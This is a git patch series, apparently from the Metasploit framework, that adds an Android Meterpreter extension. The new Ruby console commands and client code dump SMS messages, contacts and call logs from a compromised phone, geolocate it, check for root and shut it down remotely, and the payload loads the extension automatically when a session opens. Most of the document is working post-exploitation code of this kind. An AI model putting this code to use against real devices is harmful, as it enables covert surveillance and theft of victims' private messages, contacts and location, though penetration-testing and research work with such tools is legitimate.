zT~TCp@BFBwX;L~6qEyj7gw3FRh+;?kM|v$?*Kw3z`h<LO<yn4>L3Hj0--E?0tjS5G
z@J*K1auM_(+MKb!ef&(l@rL1izW6r8OOu@h>L^5X&wyyMLOC?gu+LZqdq&gFry3H`
zvY|tq6)9gx+uyL3&W-2IZNO7JBr|pSI-Q58OhLQbI2Aot8*!Hj62dJJ4|;(vZ{Ivq
zEY~Tao_7(?$79ItCs-9TpYw{YJm0Qo^EyMBOe7*-AG)kDXRe_d`!a}R1I$vrj50W1
zmfioTjWuX;EjUzc7cPdXo<2S|a8X%Pv_T5}22&a9f>E;M4(aAShS1eKv})iCB;}1!
zQAMe?45kWoy>4TMe48zC>IcUXrt;yq7#OVuIT^&)Xx!5%8u&0eI0YDAn`4g=Rhuwb
zI6=(m$xF?p)ie~~_t;AjsqRKtL6Rqz;%GFJ7&Gd0(EQzVa~9CoYQdA-BQ0Wr`#j<j
z=TBq@UTe4!uk<-fr|D_#i3B>@LrfO(Zl};x(1yQcS{9OKA|2^YA`!dSnf$hdh%hk+
z?G@E#1U-Y94=RuTyueiQJwj4r&9xaH>joG7Lxsf6mzjZiNPRv%hp!cu!RB9;)~8R=
zZZB=$7v=}i>!LPW81HL+icQ*bTH-4Fwge)&-<#)nmUBG8YJ^M7!GA6QLXY?EY%Q%e
zd^Gw?hS0g`>7Ce~g8PIZKo{3Tk6_=UpRnsCkE}triC9NX=%rV%hPH#Pi<{c82WFO<
ze`|Q7UA_K}W`;cO{B=$1aj$2o4Jd*#i}#mL=dAN8*}E=;njkJ~nAZl&+{Y`M`=cLM
zl#i;+v;z1haZ<#Nw?rsYr+ZDZ`!=$~lp@M>5*hU3;YwXVN8rQF28Qzz_s=-rw2{q-
zRX%Kn-yFTG=($%--`XvAX5tUNY(J<%B6j+ejzpWY<S(7PehWE*PH8oW*Ra@p70l9_
zs8U{5ck`{<3VDG!e7nEDE6QzO*)32bEwisuZNm#hCVZRJpmF{h?6O$KVV2vuiIp@I
z-(hy^p%SHS<NQh<Np8%?Z`&$?M1Z}6#_^G60zvi=^90no;}KC_3iKHo7+~537|lO4
z41WCm`v<Up@biNNa`0p43PeUkS%6MLRur(e{rhP@&Lg744VH5Jk*P5RIM4vc@1J~M
z3c!#5JWWPGRzg%nNts?o^r?j(zx!t}z=;3(`2ju!{QP4<_`5R@e?I}_#~Ek<4<OJI
z@^>fW{^?|a|9kQu6HWfEA>uzZ<o@>!{mfW-YVWr@sV*hS84GA<3~+G#vpo=yeBYM8
zZ%<g?QQy>F-|8=m;sR5$q3#^f0k?Sx02TTZB^Tg11-f^Cy!^kW{NK8?z(C--@4qwi
zeK7%H!oLdqZCeVM0bF_diE#rM;D5vTt2)%cjRO}aerlW<;cpxNt2(|v^M8REz}11D
z7#Pognengt1h_`&6YdfDS8;#cBfv!`p9nF4S>kVc<WGb6uiFN$k@(a$FUH@t{qw>5
zKNS;!d*cOADZ3}Y71qB4_+w!^;I@J5>pZpH_Tt}Z``@Ux1B?VN&GCf1B>m5ke^sah
zm<(Ly;E7BISa1Gj6#VR|zrNVt$$zYQ089p!sDC1_Q~!5lV8MD|GO*tG6FHjh-y#2Y
z=|Acx{Xu;k7y>LP{RBZ}{51%$yfiQgSR(j|RL1llk)8yDfl<H$uumusfHK;@9xYFI
z?yu!wfqB3RpHI9#fKKFp!~5|<`cs+>7z(UL`2>yO{59wwv?+lhz?z9q5IKNP;a9Hg
zcLhaY0<dh|6M_EKuMz$!Vh4->mVkRgi17U);z<w=7y_)^^#nN+_%+BMb-aKnz=AGM
z6hZM{rTj_W1sDXZPVxj=1~|rlrQ;p`sZ|2Z02caqVq8i7BIBR3AHWRY4EZMpvHY(y
zemsspv&eu!z=`HhAYp}H0R4-!b6_fPe)khqNb!F`{f9&B&)MF<UjaCu`ROZ6EB(*D
z!e85Oz-fX{=v%e_75e|v-N4C4PiO}1{~Z0t)Fa^g44mfkM5NI9Z;5~KdjeyDQx%@D
z^ZLJt{r@H|05gFD-Jh69M*ltY$Ho2(dj|#sM@T<`<xPG8{QrrU2BrZ=^*+&H&Hgjm
zpJIH0alk>HPdImrU&H~0IsNt12^>iE#B;X!?|6UHgTS#sPf$v`{}B2YkwL(>7I?$_
ziR$M33)H{dMgHrX3%pbPM6`GLZ;5|18vt)AJz-yY{yW&e*mL>o>jU1-c>>XS{fD4G
YT^0l&SrP<<8StkT;6|wT`|+>;2WP<uNB{r;

literal 0
HcmV?d00001

diff --git a/lib/msf/base/sessions/meterpreter_java.rb b/lib/msf/base/sessions/meterpreter_java.rb
index 84b0741b56..efded0f44f 100644
--- a/lib/msf/base/sessions/meterpreter_java.rb
+++ b/lib/msf/base/sessions/meterpreter_java.rb
@@ -22,6 +22,11 @@ class Meterpreter_Java_Java < Msf::Sessions::Meterpreter
     self.platform      = 'java/java'
     self.binary_suffix = 'jar'
   end
+  def load_android() 
+    self.platform      = 'java/android'  
+    console.disable_output = true
+    console.run_single('load android')
+  end
 end
 
 end
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
new file mode 100644
index 0000000000..af2fb79e0e
--- /dev/null
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
@@ -0,0 +1,398 @@
+# -*- coding: binary -*-
+require 'rex/post/meterpreter'
+
+module Rex
+module Post
+module Meterpreter
+module Ui
+
+###
+# Android extension - set of commands to be executed on android devices.
+# extension by Anwar Mohamed (@anwarelmakrahy)
+###
+
+class Console::CommandDispatcher::Android
+
+  include Console::CommandDispatcher
+
+  def initialize(shell)
+    super
+  end
+
+  #
+  # List of supported commands.
+  #
+ def commands
+    all = {
+      "dump_sms"          => "Get sms messages",
+      "dump_contacts"     => "Get contacts list",
+      "geolocate"         => "Get current lat-long using geolocation",
+      "dump_calllog"      => "Get call log",
+      "check_root"        => "Check if device is rooted",
+      "device_shutdown"   => "Shutdown device"
+    }
+
+    reqs = {
+      "dump_sms"   		=> [ "dump_sms" ],
+      "dump_contacts" => [ "dump_contacts"],
+      "geolocate"   	=> [ "geolocate"],
+      "dump_calllog"  => [ "dump_calllog"],
+      "check_root"    => [ "check_root"],
+      "device_shutdown" => [ "device_shutdown"]
+    }
+
+    all.delete_if do |cmd, desc|
+      reqs[cmd].any? { |req| not client.commands.include?(req) }
+    end
+
+    all
+  end
+
+  def cmd_device_shutdown(*args)
+
+    seconds = 0
+    device_shutdown_opts = Rex::Parser::Arguments.new(
+      "-h" => [ false, "Help Banner" ],
+      "-t" => [ false, "Shutdown after n seconds"]
+    )
+
+    device_shutdown_opts.parse( args ) { | opt, idx, val |
+      case opt
+      when "-h"
+        print_line( "Usage: device_shutdown [options]\n" )
+        print_line( "Shutdown device." )
+        print_line( device_shutdown_opts.usage )
+        return
+      when "-t"
+        seconds = val
+      end
+    }
+
+    res = client.android.device_shutdown(seconds)
+
+    if res == true
+      print_status("Device will shutdown #{seconds > 0 ?("after " + seconds + "seconds"):"now"}")
+    else
+      print_error("Device shutdown failed")
+    end
+  end
+  
+  def cmd_dump_sms(*args)
+
+    path = "sms_dump_" + Rex::Text.rand_text_alpha(8) + ".txt"
+    dump_sms_opts = Rex::Parser::Arguments.new(
+        "-h" => [ false, "Help Banner" ],
+        "-o" => [ false, "Output path for sms list"]
+      )
+
+    dump_sms_opts.parse( args ) { | opt, idx, val |
+      case opt
+      when "-h"
+        print_line( "Usage: dump_sms [options]\n" )
+        print_line( "Get sms messages." )
+        print_line( dump_sms_opts.usage )
+        return
+      when "-o"
+        path = val
+      end
+    }
+
+    smsList = Array.new
+    smsList = client.android.dump_sms
+
+    if smsList.count > 0
+      print_status( "Fetching #{smsList.count} sms #{smsList.count == 1? 'message': 'messages'}" )
+      begin
+        info = client.sys.config.sysinfo
+
+        ::File.open( path, 'wb' ) do |fd|
+
+          fd.write("\n=====================\n")
+          fd.write("[+] Sms messages dump\n")
+          fd.write("=====================\n\n")
+
+          time = Time.new
+          fd.write("Date: #{time.inspect}\n")
+          fd.write("OS: #{info['OS']}\n")
+          fd.write("Remote IP: #{client.sock.peerhost}\n")
+          fd.write("Remote Port: #{client.sock.peerport}\n\n")
+
+          smsList.each_with_index { |a, index|
+
+            fd.write("##{(index.to_i + 1).to_s()}\n")
+
+            type = "Unknown"
+            if a['type'] == "1"
+              type = "Incoming"
+            elsif a['type'] == "2"
+              type = "Outgoing"
+            end
+
+            status = "Unknown"
+            if a['status'] == "-1"
+              status = "NOT_RECEIVED"
+            elsif a['status'] == "1"
+              status = "SME_UNABLE_TO_CONFIRM"
+            elsif a['status'] == "0"
+              status = "SUCCESS"
+            elsif a['status'] == "64"
+              status = "MASK_PERMANENT_ERROR"
+            elsif a['status'] == "32"
+              status = "MASK_TEMPORARY_ERROR"
+            elsif a['status'] == "2"
+              status = "SMS_REPLACED_BY_SC"
+            end
+
+            fd.write("Type\t: #{type}\n")
+
+            time = a['date'].to_i / 1000
+            time = Time.at(time)
+
+            fd.write("Date\t: #{time.strftime("%Y-%m-%d %H:%M:%S")}\n")
+            fd.write("Address\t: #{a['address']}\n")
+            fd.write("Status\t: #{status}\n")
+            fd.write("Message\t: #{a['body']}\n\n")
+          }
+        end
+
+        path = ::File.expand_path( path )
+
+        print_status( "Sms #{smsList.count == 1? 'message': 'messages'} saved to: #{path}" )
+        Rex::Compat.open_file( path )
+
+        return true
+      rescue
+        print_error("Error getting messages")
+        return false
+      end
+    else
+      print_status( "No sms messages were found!" )
+      return false
+    end
+  end
+
+
+  def cmd_dump_contacts(*args)
+
+    path    = "contacts_dump_" + Rex::Text.rand_text_alpha(8) + ".txt"
+    dump_contacts_opts = Rex::Parser::Arguments.new(
+
+      "-h" => [ false, "Help Banner" ],
+      "-o" => [ false, "Output path for contacts list"]
+
+      )
+
+    dump_contacts_opts.parse( args ) { | opt, idx, val |
+      case opt
+      when "-h"
+        print_line( "Usage: dump_contacts [options]\n" )
+        print_line( "Get contacts list." )
+        print_line( dump_contacts_opts.usage )
+        return
+      when "-o"
+        path = val
+      end
+    }
+
+    contactList = Array.new
+    contactList = client.android.dump_contacts
+
+    if contactList.count > 0
+      print_status( "Fetching #{contactList.count} #{contactList.count == 1? 'contact': 'contacts'} into list" )
+      begin
+        info = client.sys.config.sysinfo
+
+        ::File.open( path, 'wb' ) do |fd|
+
+          fd.write("\n======================\n")
+          fd.write("[+] Contacts list dump\n")
+          fd.write("======================\n\n")
+
+          time = Time.new
+          fd.write("Date: #{time.inspect}\n")
+          fd.write("OS: #{info['OS']}\n")
+          fd.write("Remote IP: #{client.sock.peerhost}\n")
+          fd.write("Remote Port: #{client.sock.peerport}\n\n")
+
+          contactList.each_with_index { |c, index|
+
+            fd.write("##{(index.to_i + 1).to_s()}\n")
+            fd.write("Name\t: #{c['name']}\n")
+
+            if c['number'].count > 0
+              (c['number']).each { |n|
+                fd.write("Number\t: #{n}\n")
+              }
+            end
+
+            if c['email'].count > 0
+              (c['email']).each { |n|
+                fd.write("Email\t: #{n}\n")
+              }
+            end
+
+            fd.write("\n")
+          }
+        end
+
+        path = ::File.expand_path( path )
+        print_status( "Contacts list saved to: #{path}" )
+        Rex::Compat.open_file( path )
+
+        return true
+      rescue
+        print_error("Error getting contacts list")
+        return false
+      end
+    else
+      print_status( "No contacts were found!" )
+      return false
+    end
+  end
+
+  def cmd_geolocate(*args)
+
+    generate_map = false
+    geolocate_opts = Rex::Parser::Arguments.new(
+
+      "-h" => [ false, "Help Banner" ],
+      "-g" => [ false, "Generate map using google-maps"]
+
+      )
+
+    geolocate_opts.parse( args ) { | opt, idx, val |
+      case opt
+      when "-h"
+        print_line( "Usage: geolocate [options]\n" )
+        print_line( "Get current location using geolocation." )
+        print_line( geolocate_opts.usage )
+        return
+      when "-g"
+        generate_map = true
+      end
+    }
+
+    geo = client.android.geolocate
+
+    print_status("Current Location:\n")
+    print_line("\tLatitude  : #{geo[0]['lat']}")
+    print_line("\tLongitude : #{geo[0]['long']}\n")
+    print_line("To get the address: https://maps.googleapis.com/maps/api/geocode/json?latlng=#{geo[0]['lat']},#{geo[0]['long']}&sensor=true\n")
+
+
+    if generate_map
+      link = "https://maps.google.com/maps?q=#{geo[0]['lat']},#{geo[0]['long']}"
+      print_status("Generated map on google-maps:")
+      print_status("#{link}")
+      Rex::Compat.open_browser(link)
+    end
+
+  end
+
+  def cmd_dump_calllog(*args)
+
+    path = "dump_calllog_" + Rex::Text.rand_text_alpha(8) + ".txt"
+    dump_calllog_opts = Rex::Parser::Arguments.new(
+
+      "-h" => [ false, "Help Banner" ],
+      "-o" => [ false, "Output path for call log"]
+
+      )
+
+    dump_calllog_opts.parse( args ) { | opt, idx, val |
+      case opt
+      when "-h"
+        print_line( "Usage: dump_calllog [options]\n" )
+        print_line( "Get call log." )
+        print_line( dump_calllog_opts.usage )
+        return
+      when "-o"
+        path = val
+      end
+    }
+
+    log = client.android.dump_calllog
+
+    if log.count > 0
+      print_status( "Fetching #{log.count} #{log.count == 1? 'entry': 'entries'}" )
+      begin
+        info = client.sys.config.sysinfo
+
+        ::File.open( path, 'wb' ) do |fd|
+
+          fd.write("\n=================\n")
+          fd.write("[+] Call log dump\n")
+          fd.write("=================\n\n")
+
+          time = Time.new
+          fd.write("Date: #{time.inspect}\n")
+          fd.write("OS: #{info['OS']}\n")
+          fd.write("Remote IP: #{client.sock.peerhost}\n")
+          fd.write("Remote Port: #{client.sock.peerport}\n\n")
+
+          log.each_with_index { |a, index|
+
+            fd.write("##{(index.to_i + 1).to_s()}\n")
+
+            fd.write("Number\t: #{a['number']}\n")
+            fd.write("Name\t: #{a['name']}\n")
+            fd.write("Date\t: #{a['date']}\n")
+            fd.write("Type\t: #{a['type']}\n")
+            fd.write("Duration: #{a['duration']}\n\n")
+          }
+        end
+
+        path = ::File.expand_path( path )
+        print_status( "Call log saved to: #{path}" )
+        Rex::Compat.open_file( path )
+
+        return true
+      rescue
+        print_error("Error getting call log")
+        return false
+      end
+    else
+      print_status( "No call log entries were found!" )
+      return false
+    end
+  end
+
+
+  def cmd_check_root(*args)
+
+    check_root_opts = Rex::Parser::Arguments.new(
+      "-h" => [ false, "Help Banner" ]
+      )
+
+    check_root_opts.parse( args ) { | opt, idx, val |
+      case opt
+      when "-h"
+        print_line( "Usage: check_root [options]\n" )
+        print_line( "Check if device is rooted." )
+        print_line( check_root_opts.usage )
+        return
+      end
+    }
+
+    isRooted = client.android.check_root
+
+    if isRooted == true
+      print_status("Device is rooted")
+    elsif
+      print_status("Device is not rooted")
+    end
+  end
+
+  #
+  # Name for this dispatcher
+  #
+  def name
+    "Android"
+  end
+
+end
+
+end
+end
+end
+end
diff --git a/modules/payloads/stages/android/meterpreter.rb b/modules/payloads/stages/android/meterpreter.rb
index 0aa648e08e..cbdd2578f2 100644
--- a/modules/payloads/stages/android/meterpreter.rb
+++ b/modules/payloads/stages/android/meterpreter.rb
@@ -22,12 +22,18 @@ module Metasploit3
       'Description'	=> 'Run a meterpreter server on Android',
       'Author'		=> [
           'mihi', # all the hard work
-          'egypt' # msf integration
+          'egypt', # msf integration
+          'anwarelmakrahy' # android extension
         ],
       'Platform'		=> 'android',
       'Arch'			=> ARCH_DALVIK,
       'License'		=> MSF_LICENSE,
       'Session'		=> Msf::Sessions::Meterpreter_Java_Java))
+
+    register_options(
+    [
+      OptBool.new('AutoLoadAndroid', [true, "Automatically load the Android extension", true])
+    ], self.class)
   end
 
   #
@@ -46,4 +52,14 @@ module Metasploit3
     # it from, and then finally the meterpreter stage
     java_string(clazz) + java_string(metstage) + java_string(met)
   end
+
+  def on_session(session)
+    super
+    framework.sessions.schedule Proc.new {
+      session.init_ui(self.user_input, self.user_output)
+      if (datastore['AutoLoadAndroid'] == true)
+        session.load_android
+      end
+    }
+  end
 end

From 656da8a63ba86bc4858612c6d632055f11c90b99 Mon Sep 17 00:00:00 2001
From: AnwarMohamed <anwarelmakrahy@gmail.com>
Date: Tue, 8 Jul 2014 04:56:04 +0200
Subject: [PATCH 124/321] android extension

---
 .../meterpreter/extensions/android/android.rb | 127 ++++++++++++++++++
 .../meterpreter/extensions/android/tlv.rb     |  35 +++++
 2 files changed, 162 insertions(+)
 create mode 100644 lib/rex/post/meterpreter/extensions/android/android.rb
 create mode 100644 lib/rex/post/meterpreter/extensions/android/tlv.rb

diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb
new file mode 100644
index 0000000000..6d65f71bd4
--- /dev/null
+++ b/lib/rex/post/meterpreter/extensions/android/android.rb
@@ -0,0 +1,127 @@
+#!/usr/bin/env ruby
+# -*- coding: binary -*-
+
+require 'rex/post/meterpreter/extensions/android/tlv'
+require 'rex/post/meterpreter/packet'
+require 'rex/post/meterpreter/client'
+require 'rex/post/meterpreter/channels/pools/stream_pool'
+
+
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Android
+
+###
+# Android extension - set of commands to be executed on android devices.
+# extension by Anwar Mohamed (@anwarelmakrahy)
+###
+
+  
+class Android < Extension
+
+  def initialize(client)
+    super(client, 'android')
+
+    # Alias the following things on the client object so that they
+    # can be directly referenced
+    client.register_extension_aliases(
+      [
+        {
+          'name' => 'android',
+          'ext'  => self
+        },
+      ])
+  end
+  
+  def device_shutdown(n)
+    request = Packet.create_request('device_shutdown')
+    request.add_tlv(TLV_TYPE_SHUTDOWN_TIMER, n)
+    response = client.send_request(request)
+    return response.get_tlv(TLV_TYPE_SHUTDOWN_OK).value
+  end 
+  
+  def dump_sms
+    sms = Array.new
+    request = Packet.create_request('dump_sms')
+    response = client.send_request(request)
+
+    response.each( TLV_TYPE_SMS_GROUP ) { |p|
+
+      sms <<
+      {
+        'type' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_TYPE).value),
+        'address' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_ADDRESS).value),
+        'body' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_BODY).value).squish,
+        'status' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_STATUS).value),
+        'date' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_DATE).value)
+      }
+
+    }
+    return sms
+  end
+
+  def dump_contacts
+    contacts = Array.new
+    request = Packet.create_request('dump_contacts')
+    response = client.send_request(request)
+
+    response.each( TLV_TYPE_CONTACT_GROUP ) { |p|
+
+      contacts <<
+      {
+        'name' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CONTACT_NAME).value),
+        'email' => client.unicode_filter_encode(p.get_tlv_values(TLV_TYPE_CONTACT_EMAIL)),
+        'number' => client.unicode_filter_encode(p.get_tlv_values(TLV_TYPE_CONTACT_NUMBER))
+      }
+
+    }
+    return contacts
+  end
+
+  def geolocate
+
+    loc = Array.new
+    request = Packet.create_request('geolocate')
+    response = client.send_request(request)
+
+    loc <<
+    {
+      'lat' => "#{client.unicode_filter_encode(response.get_tlv(TLV_TYPE_GEO_LAT).value)}",
+      'long' => "#{client.unicode_filter_encode(response.get_tlv(TLV_TYPE_GEO_LONG).value)}"
+    }
+
+    return loc
+  end
+
+  def dump_calllog
+    log = Array.new
+    request = Packet.create_request('dump_calllog')
+    response = client.send_request(request)
+
+    response.each(TLV_TYPE_CALLLOG_GROUP) { |p|
+
+      log <<
+      {
+        'name' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_NAME).value),
+        'number' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_NUMBER).value),
+        'date' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_DATE).value),
+        'duration' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_DURATION).value),
+        'type' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_TYPE).value)
+      }
+
+    }
+    return log
+  end
+
+  def check_root
+    request = Packet.create_request('check_root')
+    response = client.send_request(request)
+    is_rooted = response.get_tlv(TLV_TYPE_CHECK_ROOT_BOOL).value
+    return is_rooted
+  end
+  
+end
+
+end; end; end; end; end
diff --git a/lib/rex/post/meterpreter/extensions/android/tlv.rb b/lib/rex/post/meterpreter/extensions/android/tlv.rb
new file mode 100644
index 0000000000..9edd9214ec
--- /dev/null
+++ b/lib/rex/post/meterpreter/extensions/android/tlv.rb
@@ -0,0 +1,35 @@
+#!/usr/bin/env ruby
+# -*- coding: binary -*-
+
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Android
+
+TLV_TYPE_SMS_ADDRESS      = TLV_META_TYPE_STRING 		| (TLV_EXTENSIONS + 9001)
+TLV_TYPE_SMS_BODY         = TLV_META_TYPE_STRING 		| (TLV_EXTENSIONS + 9002)
+TLV_TYPE_SMS_TYPE         = TLV_META_TYPE_STRING 		| (TLV_EXTENSIONS + 9003)
+TLV_TYPE_SMS_GROUP        = TLV_META_TYPE_GROUP 		| (TLV_EXTENSIONS + 9004)
+TLV_TYPE_SMS_STATUS       = TLV_META_TYPE_STRING 		| (TLV_EXTENSIONS + 9005)
+TLV_TYPE_SMS_DATE         = TLV_META_TYPE_STRING 		| (TLV_EXTENSIONS + 9006)
+
+TLV_TYPE_CONTACT_GROUP    = TLV_META_TYPE_GROUP 		| (TLV_EXTENSIONS + 9007)
+TLV_TYPE_CONTACT_NUMBER   = TLV_META_TYPE_STRING 		| (TLV_EXTENSIONS + 9008)
+TLV_TYPE_CONTACT_EMAIL    = TLV_META_TYPE_STRING 		| (TLV_EXTENSIONS + 9009)
+TLV_TYPE_CONTACT_NAME     = TLV_META_TYPE_STRING 		| (TLV_EXTENSIONS + 9010)
+
+TLV_TYPE_GEO_LAT          = TLV_META_TYPE_STRING 		| (TLV_EXTENSIONS + 9011)
+TLV_TYPE_GEO_LONG         = TLV_META_TYPE_STRING 		| (TLV_EXTENSIONS + 9012)
+
+TLV_TYPE_CALLLOG_NAME     = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9013)
+TLV_TYPE_CALLLOG_TYPE     = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9014)
+TLV_TYPE_CALLLOG_DATE     = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9015)
+TLV_TYPE_CALLLOG_DURATION = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9016)
+TLV_TYPE_CALLLOG_GROUP    = TLV_META_TYPE_GROUP     | (TLV_EXTENSIONS + 9017)
+TLV_TYPE_CALLLOG_NUMBER   = TLV_META_TYPE_STRING 		| (TLV_EXTENSIONS + 9018)
+
+TLV_TYPE_CHECK_ROOT_BOOL  = TLV_META_TYPE_BOOL     | (TLV_EXTENSIONS + 9019)
+
+TLV_TYPE_SHUTDOWN_TIMER   = TLV_META_TYPE_UINT    | (TLV_EXTENSIONS + 9020)
+end; end; end; end; end

From 6e0bc763ffb29dfdfc5703f76d88513b565adb28 Mon Sep 17 00:00:00 2001
From: AnwarMohamed <anwarelmakrahy@gmail.com>
Date: Tue, 8 Jul 2014 10:46:16 +0200
Subject: [PATCH 125/321] formating

---
 lib/msf/base/sessions/meterpreter_java.rb     |   2 +-
 .../meterpreter/extensions/android/android.rb |  13 +-
 .../meterpreter/extensions/android/tlv.rb     |  37 +--
 .../ui/console/command_dispatcher/android.rb  | 264 +++++++++---------
 4 files changed, 162 insertions(+), 154 deletions(-)

diff --git a/lib/msf/base/sessions/meterpreter_java.rb b/lib/msf/base/sessions/meterpreter_java.rb
index efded0f44f..8c697ac91a 100644
--- a/lib/msf/base/sessions/meterpreter_java.rb
+++ b/lib/msf/base/sessions/meterpreter_java.rb
@@ -23,7 +23,7 @@ class Meterpreter_Java_Java < Msf::Sessions::Meterpreter
     self.binary_suffix = 'jar'
   end
   def load_android() 
-    self.platform      = 'java/android'  
+    self.platform = 'java/android'  
     console.disable_output = true
     console.run_single('load android')
   end
diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb
index 6d65f71bd4..b6e5cb0c12 100644
--- a/lib/rex/post/meterpreter/extensions/android/android.rb
+++ b/lib/rex/post/meterpreter/extensions/android/android.rb
@@ -88,8 +88,8 @@ class Android < Extension
 
     loc <<
     {
-      'lat' => "#{client.unicode_filter_encode(response.get_tlv(TLV_TYPE_GEO_LAT).value)}",
-      'long' => "#{client.unicode_filter_encode(response.get_tlv(TLV_TYPE_GEO_LONG).value)}"
+      'lat' => client.unicode_filter_encode(response.get_tlv(TLV_TYPE_GEO_LAT).value),
+      'long' => client.unicode_filter_encode(response.get_tlv(TLV_TYPE_GEO_LONG).value)
     }
 
     return loc
@@ -118,10 +118,13 @@ class Android < Extension
   def check_root
     request = Packet.create_request('check_root')
     response = client.send_request(request)
-    is_rooted = response.get_tlv(TLV_TYPE_CHECK_ROOT_BOOL).value
-    return is_rooted
+    response.get_tlv(TLV_TYPE_CHECK_ROOT_BOOL).value
   end
   
 end
 
-end; end; end; end; end
+end; 
+end; 
+end; 
+end; 
+end
diff --git a/lib/rex/post/meterpreter/extensions/android/tlv.rb b/lib/rex/post/meterpreter/extensions/android/tlv.rb
index 9edd9214ec..fbd9efd227 100644
--- a/lib/rex/post/meterpreter/extensions/android/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/android/tlv.rb
@@ -7,29 +7,34 @@ module Meterpreter
 module Extensions
 module Android
 
-TLV_TYPE_SMS_ADDRESS      = TLV_META_TYPE_STRING 		| (TLV_EXTENSIONS + 9001)
-TLV_TYPE_SMS_BODY         = TLV_META_TYPE_STRING 		| (TLV_EXTENSIONS + 9002)
-TLV_TYPE_SMS_TYPE         = TLV_META_TYPE_STRING 		| (TLV_EXTENSIONS + 9003)
-TLV_TYPE_SMS_GROUP        = TLV_META_TYPE_GROUP 		| (TLV_EXTENSIONS + 9004)
-TLV_TYPE_SMS_STATUS       = TLV_META_TYPE_STRING 		| (TLV_EXTENSIONS + 9005)
-TLV_TYPE_SMS_DATE         = TLV_META_TYPE_STRING 		| (TLV_EXTENSIONS + 9006)
+TLV_TYPE_SMS_ADDRESS      = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9001)
+TLV_TYPE_SMS_BODY         = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9002)
+TLV_TYPE_SMS_TYPE         = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9003)
+TLV_TYPE_SMS_GROUP        = TLV_META_TYPE_GROUP     | (TLV_EXTENSIONS + 9004)
+TLV_TYPE_SMS_STATUS       = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9005)
+TLV_TYPE_SMS_DATE         = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9006)
 
-TLV_TYPE_CONTACT_GROUP    = TLV_META_TYPE_GROUP 		| (TLV_EXTENSIONS + 9007)
-TLV_TYPE_CONTACT_NUMBER   = TLV_META_TYPE_STRING 		| (TLV_EXTENSIONS + 9008)
-TLV_TYPE_CONTACT_EMAIL    = TLV_META_TYPE_STRING 		| (TLV_EXTENSIONS + 9009)
-TLV_TYPE_CONTACT_NAME     = TLV_META_TYPE_STRING 		| (TLV_EXTENSIONS + 9010)
+TLV_TYPE_CONTACT_GROUP    = TLV_META_TYPE_GROUP     | (TLV_EXTENSIONS + 9007)
+TLV_TYPE_CONTACT_NUMBER   = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9008)
+TLV_TYPE_CONTACT_EMAIL    = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9009)
+TLV_TYPE_CONTACT_NAME     = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9010)
 
-TLV_TYPE_GEO_LAT          = TLV_META_TYPE_STRING 		| (TLV_EXTENSIONS + 9011)
-TLV_TYPE_GEO_LONG         = TLV_META_TYPE_STRING 		| (TLV_EXTENSIONS + 9012)
+TLV_TYPE_GEO_LAT          = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9011)
+TLV_TYPE_GEO_LONG         = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9012)
 
 TLV_TYPE_CALLLOG_NAME     = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9013)
 TLV_TYPE_CALLLOG_TYPE     = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9014)
 TLV_TYPE_CALLLOG_DATE     = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9015)
 TLV_TYPE_CALLLOG_DURATION = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9016)
 TLV_TYPE_CALLLOG_GROUP    = TLV_META_TYPE_GROUP     | (TLV_EXTENSIONS + 9017)
-TLV_TYPE_CALLLOG_NUMBER   = TLV_META_TYPE_STRING 		| (TLV_EXTENSIONS + 9018)
+TLV_TYPE_CALLLOG_NUMBER   = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9018)
 
-TLV_TYPE_CHECK_ROOT_BOOL  = TLV_META_TYPE_BOOL     | (TLV_EXTENSIONS + 9019)
+TLV_TYPE_CHECK_ROOT_BOOL  = TLV_META_TYPE_BOOL      | (TLV_EXTENSIONS + 9019)
 
-TLV_TYPE_SHUTDOWN_TIMER   = TLV_META_TYPE_UINT    | (TLV_EXTENSIONS + 9020)
-end; end; end; end; end
+TLV_TYPE_SHUTDOWN_TIMER   = TLV_META_TYPE_UINT      | (TLV_EXTENSIONS + 9020)
+
+end; 
+end; 
+end; 
+end; 
+end
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
index af2fb79e0e..a7c4f872da 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
